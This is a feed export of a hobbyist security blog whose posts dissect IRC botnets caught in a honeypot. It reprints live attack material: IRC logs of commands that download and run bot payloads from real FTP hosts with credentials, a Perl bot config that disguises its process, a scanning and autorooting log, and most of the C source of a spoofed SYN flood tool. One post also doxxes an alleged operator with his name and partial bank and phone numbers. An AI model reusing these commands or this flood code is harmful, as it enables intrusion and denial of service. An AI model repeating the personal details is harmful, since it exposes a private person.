tag:blogger.com,1999:blog-25807488545256614542024-02-06T21:21:15.776-08:00ITS Ownzhmm don't really know but its about security and stuff like thatbi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.comBlogger106125tag:blogger.com,1999:blog-2580748854525661454.post-12346828035889623512017-04-22T09:06:00.001-07:002020-03-10T05:27:01.240-07:00Blue Botnet - topksa.net - Skidd ( kingv ) So another skid tryed infect my honeypot and infecting it whith Blue Bot<br />
also here is his c&c <br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">hxxp://topksa.net/WebPanel/login.php
http://topksa.net/WebPanel/visitors.txt
http://topksa.net/WebPanel/botlogger.php 60 bots
</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipzlR8bA4jUMDpnckKx-WebNYrCdCcB_-Bpsb3DIe14MzSeHireoocBSs6CLQl4gnJgAG7UK3rhbTf_4Zn52Nl3kOxC8oHSL6zsaelKePiMemv256d6YZZxIT3uKcAdkN1SLrCKi3AQEQ/s1600/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipzlR8bA4jUMDpnckKx-WebNYrCdCcB_-Bpsb3DIe14MzSeHireoocBSs6CLQl4gnJgAG7UK3rhbTf_4Zn52Nl3kOxC8oHSL6zsaelKePiMemv256d6YZZxIT3uKcAdkN1SLrCKi3AQEQ/s320/0.png" width="320" /></a> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Well he is running some bitcoin bizz dunno to bored to translate that but anyway he provides us an email to him an some bank account nummbers , so lets just serch more about him maybe somthying interesting in google or facebook .<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEg0jp2xbqZLXmnn2BDk4Sh7rt86KrURrndU_j1f9WSPSZbOKFRiyxr-QSdETxCOzWhh22f7JuuyznM7kdKEtQpJ5ZwJCPZfmp3EtuePKfGech3GmLtBNq0XMft_pecx6YRElofD2BTs/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEg0jp2xbqZLXmnn2BDk4Sh7rt86KrURrndU_j1f9WSPSZbOKFRiyxr-QSdETxCOzWhh22f7JuuyznM7kdKEtQpJ5ZwJCPZfmp3EtuePKfGech3GmLtBNq0XMft_pecx6YRElofD2BTs/s320/1.png" width="320" /></a></div>
So found his bank account nummer on some forum that link to his nick<br />
so but he wana be a legit seller and a good guy and ye he provides us a phone nummer and his real name of course .<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMr0kj6ZfC0fj4qbL2NJYIXib2eoeDt-kB6IfFkA5EMplb5aF8vn6t_NDTofAzLtbEmSyFap8KJgAHvaQLtypDXKuXdOKyVAZ6huNeH4Bb4gm9tcr_1b__2z5B-FWJtH8Hm7eRRUS2tYo/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMr0kj6ZfC0fj4qbL2NJYIXib2eoeDt-kB6IfFkA5EMplb5aF8vn6t_NDTofAzLtbEmSyFap8KJgAHvaQLtypDXKuXdOKyVAZ6huNeH4Bb4gm9tcr_1b__2z5B-FWJtH8Hm7eRRUS2tYo/s320/2.png" width="320" /></a></div>
<span class="" id="result_box" lang="en">Saad Saleh Rashed<br />
<span class="">Al Rajhi Account Number / 11860801021****</span><br />
<span class="">Mobile 0551858***</span></span><br />
okej but hope that info does not link to his ffacebook acc .. or ?<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfzABsevAM8lQGTQulkK-tG5tVuyw2fRyhF2omUwNSrvYmJ8Fau03pHJC-PYL5zU0Q7KZkL6421QhCtt68NEP4MENdW-Vy9VfinnuYq0CIgVz3C8RsMZQuD_iaZcEGl1VzZ8Avwj9ZJ-Q/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfzABsevAM8lQGTQulkK-tG5tVuyw2fRyhF2omUwNSrvYmJ8Fau03pHJC-PYL5zU0Q7KZkL6421QhCtt68NEP4MENdW-Vy9VfinnuYq0CIgVz3C8RsMZQuD_iaZcEGl1VzZ8Avwj9ZJ-Q/s320/3.png" width="320" /></a></div>
yep ! damm no pic's but his status says It's complicated!! maybe later more on this skidd :) peace . <br />
<br />bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-73749308565850342062016-12-10T16:37:00.003-08:002016-12-10T16:51:38.384-08:00IRC - drona.bot.nu - Botnet<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">Spreading ftp server :
ft*://kobra:kobra@195.234.176.57/
bot config </code><code style="color: black; word-wrap: normal;">////////pbot.php////////
class pBot
{
var $config = array("server" => "112.124.47.140", "port" => "2222", "pass" => "",
"prefix" => "NOU", "maxrand" => "6", "chan" => "#pma", "chan2" => "#pma2",
"key" => "NEW", "modes" => "+pwisx", "password" => "123", "trigger" => ".",
"hostauth" => "ANONYMOUS.XYZ", "limit" => "300"
);
/////////end//////////
</code></pre>
<br />
<br />
Also first no dns at this poit to prevent suspending but soon as the new infected machine joins IRC auto msg from user "w" whith an<br />
mrc script commands the bot to download new bot file :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbvl0HsTWvVsTFyT4-8IgtieKx8rT3mukkJfCx140pLDIeo0-HawB70zG_RSjXAVJLRM2ZMUdHCahpHv9sH_KWo41cd4J9Fs-fJv5jeNdzIZpNj3Z0UKZxgQjeauICH3_i-oIiFlmSClY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
<img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbvl0HsTWvVsTFyT4-8IgtieKx8rT3mukkJfCx140pLDIeo0-HawB70zG_RSjXAVJLRM2ZMUdHCahpHv9sH_KWo41cd4J9Fs-fJv5jeNdzIZpNj3Z0UKZxgQjeauICH3_i-oIiFlmSClY/s320/1.png" width="320" /></a></div>
<br />
Here the msg from "w"<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">[20:59] <w> .user ro
[20:59] <w> .uname
[20:59] <w> .exec killall -9 perl
[20:59] <w> .exec cd /tmp/;wget ***://user:ggallery@66.71.191.82/a.pdf ;
curl -O f*p://user:ggallery@66.71.191.82/a.pdf ;
fetch f*p://user:ggallery@66.71.191.82/a.pdf ;
lwp-download ftp://user:ggallery@66.71.191.82/a.pdf ; perl a.pdf ; rm -rf a.*
[20:59] <w> .exec cd /dev/shm/;wget ***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;
./autorun;./run;
[20:59] <w> .download *****/lewl.ucoz.site/sexy.exe D:\sexy.exe
[20:59] <w> .exec start sexy.exe
[20:59] <w> .download ****//lewl.ucoz.site/sexy.exe C:\sexy.exe
[20:59] <w> .exec start D:\sexy.exe
[20:59] <w> .exec start C:\sexy.exe
[20:59] <w> .exec del sexy.exe C:\sexy.exe
[20:59] <w> .exec rm -rf sexy.exe C:\sexy.exe perl*
[20:59] <w> .exec cd /dev/shm ;wget f***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;./run;
[20:59] <w> .start D:\sexy.exe
[20:59] <w> .start C:\sexy.exe
[20:59] <w> .die
</code></pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh244QNgGgSSWGa_GNDXy_bBnyNtjK8ZG3URwkJw8TD9dWq2U4P07qPZNcp8ctNH_-NZY_WFIhXbzYcWwFEaPeRmJOQdVdduiqj1hZretnSv7u1UKZjyXnK-1kAVN8YLrmKuH0FMfqi2xw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh244QNgGgSSWGa_GNDXy_bBnyNtjK8ZG3URwkJw8TD9dWq2U4P07qPZNcp8ctNH_-NZY_WFIhXbzYcWwFEaPeRmJOQdVdduiqj1hZretnSv7u1UKZjyXnK-1kAVN8YLrmKuH0FMfqi2xw/s320/2.png" width="320" /></a></div>
<br />
Also lets check ftp : 3 files<br />
<ul>
<li>a.pdf // new bot whith the dns</li>
<li>drn.tgz // Linux backdoor and irc bot</li>
<li>gscan.tgz // His personal ZeMu setup</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvdOy_X0nzIRfeaJemAXgLzfAYlwPLvAeaANSow9DchMTjN-IJxIEhktxm5l7eKLV2KuVOD8jmqb_atRMJtqD25sKjBN2eq-AbVlyfOH7crwdtVeRjaT2lw_zMJ3OrUOjqtEgseUE3T3s/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvdOy_X0nzIRfeaJemAXgLzfAYlwPLvAeaANSow9DchMTjN-IJxIEhktxm5l7eKLV2KuVOD8jmqb_atRMJtqD25sKjBN2eq-AbVlyfOH7crwdtVeRjaT2lw_zMJ3OrUOjqtEgseUE3T3s/s320/3.png" width="320" /></a></div>
And in a.pdf we see hes real dns and one photo down too<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQAgfwLwsomlUQ9hDhpwgvoPwYDmcxVFBjMS3rTZrjb3i93jrjyEd6rpjKdFSDJNqPvbAEpPv8rymA3QuFrhTptNyGJ_RGA0S6oY0ajEKVZTc_q5ke7LS6_4QmzDKsYfkpEOCMGa0hHdY/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQAgfwLwsomlUQ9hDhpwgvoPwYDmcxVFBjMS3rTZrjb3i93jrjyEd6rpjKdFSDJNqPvbAEpPv8rymA3QuFrhTptNyGJ_RGA0S6oY0ajEKVZTc_q5ke7LS6_4QmzDKsYfkpEOCMGa0hHdY/s320/4.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTSwgaNnaXdF5JHAULRuoCFY0_Pbp7_i1RojaQlQGYRTmnM_dDf76s3u_ax7wemnTl-ddaa49XYjMBfeq6hmdvjEKulhvhG9hqcDrP9_nb9yAPHdIKkS8PVvAgRetcAvWPn4pGZ3odKJU/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTSwgaNnaXdF5JHAULRuoCFY0_Pbp7_i1RojaQlQGYRTmnM_dDf76s3u_ax7wemnTl-ddaa49XYjMBfeq6hmdvjEKulhvhG9hqcDrP9_nb9yAPHdIKkS8PVvAgRetcAvWPn4pGZ3odKJU/s320/5.png" width="320" /></a></div>
<br />
<br />
// Dont download if u dont know what u doing .... drn.tgz : <a href="https://www.upload.ee/files/6438413/drn.tgz.html">Sample</a><br />
And Sexy.exe is a irc bot to mIRC base , packed as a SFX arschive<br />
some files : <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP03wqFNIgubTxGR6QfAAAc5EqpQVvXgaOaVNlZOA89vOz7Usmu1zf2TTXu_os5_3w5kRTC2K0udToeSW_bx_SPUT6g5-beyxild5YVuPmZFkq4mopykmzynROM-3o9Tt8jkUtpv8eadw/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP03wqFNIgubTxGR6QfAAAc5EqpQVvXgaOaVNlZOA89vOz7Usmu1zf2TTXu_os5_3w5kRTC2K0udToeSW_bx_SPUT6g5-beyxild5YVuPmZFkq4mopykmzynROM-3o9Tt8jkUtpv8eadw/s320/10.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8W2m1UxnfdeVRmFGDZNdG-UsYeK2YeyXOR-3FAZdMhX4xibPdoThvDVnrh03fml2LhvUTZBYhVGD9QqxfouHyNTlH_aSBic6lMod2yjelMH6dUKP20hrP6mzCiGniaGRcM7xponuyBWc/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8W2m1UxnfdeVRmFGDZNdG-UsYeK2YeyXOR-3FAZdMhX4xibPdoThvDVnrh03fml2LhvUTZBYhVGD9QqxfouHyNTlH_aSBic6lMod2yjelMH6dUKP20hrP6mzCiGniaGRcM7xponuyBWc/s320/11.png" width="320" /></a></div>
<br />
And some other things found on his ftp , a yeah he fortgot to give limited access to that ftp user or just dumb to user anonymous user ... anyways all his shit rm -f * . If someone interested in this shit just email me :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHarR5QDg-GprIsaq7IAxI5Fj0dYbcuPpiiR-dOpuebmMS7byAXDk04v2lOew5ThSwl4oAqgxplHzMEqpd9tHjxScafKpCyqpkkQQPQSmCRSNNzTToirW84WIJW0VWhkUVSuI4cmRdtU0/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHarR5QDg-GprIsaq7IAxI5Fj0dYbcuPpiiR-dOpuebmMS7byAXDk04v2lOew5ThSwl4oAqgxplHzMEqpd9tHjxScafKpCyqpkkQQPQSmCRSNNzTToirW84WIJW0VWhkUVSuI4cmRdtU0/s320/12.png" width="320" /></a></div>
bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-11838096017088370642016-11-28T14:08:00.000-08:002016-11-28T14:08:04.845-08:00ragebot - scan1.zapto.org - t0nixx [SKID]<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
>> NICK raGe|cjxtdsvUOE
>> USER mnquru "fo1.net" "rage" :mnquru
<< NOTICE AUTH :*** eh...
<< 001 raGe|cjxtdsvUOE
<< 002 raGe|cjxtdsvUOE
<< 003 raGe|cjxtdsvUOE
<< 004 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 422 raGe|cjxtdsvUOE :MOTD File is missing
<< MODE raGe|cjxtdsvUOE :+iwG
<< JOIN :#!b!#
>> JOIN #vnc #vnc
<< JOIN :#vnc
<< 332 raGe|cjxtdsvUOE #vnc :.xpl 94 1 23.26.x.x 3 1 23.26.x.x 3 1 / .scan 94 1 23.26.x.x 3 1 23.26.255.255 3 1
<< 333 raGe|cjxtdsvUOE #vnc akanz 1480289648
>> PRIVMSG #vnc :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 23.26.x.x with 94 threads. (autorooting)
>> PING :NhG.server
>> PONG NhG.server
>> JOIN #vnc #vnc
</code></pre>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com1tag:blogger.com,1999:blog-2580748854525661454.post-70865299319396646052016-11-19T10:01:00.001-08:002016-12-30T09:53:56.322-08:005k - Perl/ShellBot.B ddos - IRC<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4tTiZFLVF8i748Q0YPpMVyhL0WSgWgs5CtuVGfjmPtRDmNBfC5yX_hyphenhyphenapb7bIS5BfvfNO9aGtQru4A17Qt4dPcZG7HA_OLCqnvRor9qRf8F48A1r_RjfaQ9rqkEQxkjyKVo1H-7JQCWw/s1600/scan.png" imageanchor="1"><img border="0" height="279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4tTiZFLVF8i748Q0YPpMVyhL0WSgWgs5CtuVGfjmPtRDmNBfC5yX_hyphenhyphenapb7bIS5BfvfNO9aGtQru4A17Qt4dPcZG7HA_OLCqnvRor9qRf8F48A1r_RjfaQ9rqkEQxkjyKVo1H-7JQCWw/s320/scan.png" width="320" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQG5ed4rnXSKDXACyI6G6ciLVcAKHaFoi2IeTClcHIwTWP3QSnIcqV9z2DH4YKQ507k0r9IpBei2QyA6AI3yfnejgrQWu5qokPBeJJ3hpYBxJdr0S0f0f-oQTMbUJLq-P_8xlXvJ5AnM8/s1600/3.png" imageanchor="1"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQG5ed4rnXSKDXACyI6G6ciLVcAKHaFoi2IeTClcHIwTWP3QSnIcqV9z2DH4YKQ507k0r9IpBei2QyA6AI3yfnejgrQWu5qokPBeJJ3hpYBxJdr0S0f0f-oQTMbUJLq-P_8xlXvJ5AnM8/s320/3.png" width="320" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTubccw_MmUZBvph2a0o_iw43yVYcgVeSekXEu7XZz-ez1wZiQhsc03nqUgESUwbbzXKGyZWsKrb402actjM-Wi-tdO672r4n_uoqeGnf2OGccbQJ8B_-lpKfGbfjnAibyhIurzCEkWpk/s1600/lol.png" imageanchor="1"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTubccw_MmUZBvph2a0o_iw43yVYcgVeSekXEu7XZz-ez1wZiQhsc03nqUgESUwbbzXKGyZWsKrb402actjM-Wi-tdO672r4n_uoqeGnf2OGccbQJ8B_-lpKfGbfjnAibyhIurzCEkWpk/s320/lol.png" width="320" /></a><br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
# TeaMrx Perlbot vS xeQT
my @mast3rs = ("Low","Loww");
my @admchan=("#Perli");
$servidor='188.119.151.131' unless $servidor; // his server
my $xeqt = "!x";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;
my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
"/usr/sbin/httpd -k start -DSSL",
"/usr/sbin/httpd",
"spamd child",
"httpd");
my @nickname = ("TeaMrx","......","xQt");
my @xident = ("noway",......yn","ju");
my @xname = ("Googurl (C) 2006 xeQt","........","Team Work","jet lie");
#################
# Random Ports
#################
my @rports = ("6667");
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
"\001Snak for Macintosh 4.9.8 English\001",
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
"\001ircN 8.00 - he tries to tell me what I put inside of me - \001",
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1á9] : Keep it to yourself!\001",
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");
# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
# xeQt
#my $nick = "sshb0t1";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'vSm0d (C) TeaMrx';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("$homedir");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$xproc"."\0";
my $pid=fork;
exit if $pid;
die "[x] -> Cannot fork into background: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
sub getnick {
return "$nickname[rand scalar @nickname]".int(rand(1000));
}
neeedd to delete some shit coz site gets blacklisted
}
</code></pre>
<br />
ahh found this in his spreaading ftp maybe interesting to someone ....<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
*/
#include unistd.h
#include time.h
#include sys/types.h
#include sys/socket.h
#include sys/ioctl.h
#include string.h
#include stdlib.h
#include stdio.h
#include pthread.h
#include netinet/tcp.h
#include netinet/ip.h
#include netinet/in.h
#include netinet/if_ether.h
#include netdb.h
#include net/if.h
#include arpa/inet.h
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr("192.168.3.100");
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(5678);
tcph->seq = rand();
tcph->ack_seq = 0;
tcph->res2 = 3;
tcph->doff = 5;
tcph->syn = 1;
tcph->window = htonl(65535);
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(floodport);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
while(1){
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 6){
fprintf(stderr, "Invalid parameters!\n");
fprintf(stdout, "Usage: %s <target ip=""> <port be="" flooded="" to=""> <number threads="" to="" use=""> <pps -1="" for="" limit="" limiter="" no=""> <time>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "Setting up Sockets...\n");
int num_threads = atoi(argv[3]);
floodport = atoi(argv[2]);
int maxpps = atoi(argv[4]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
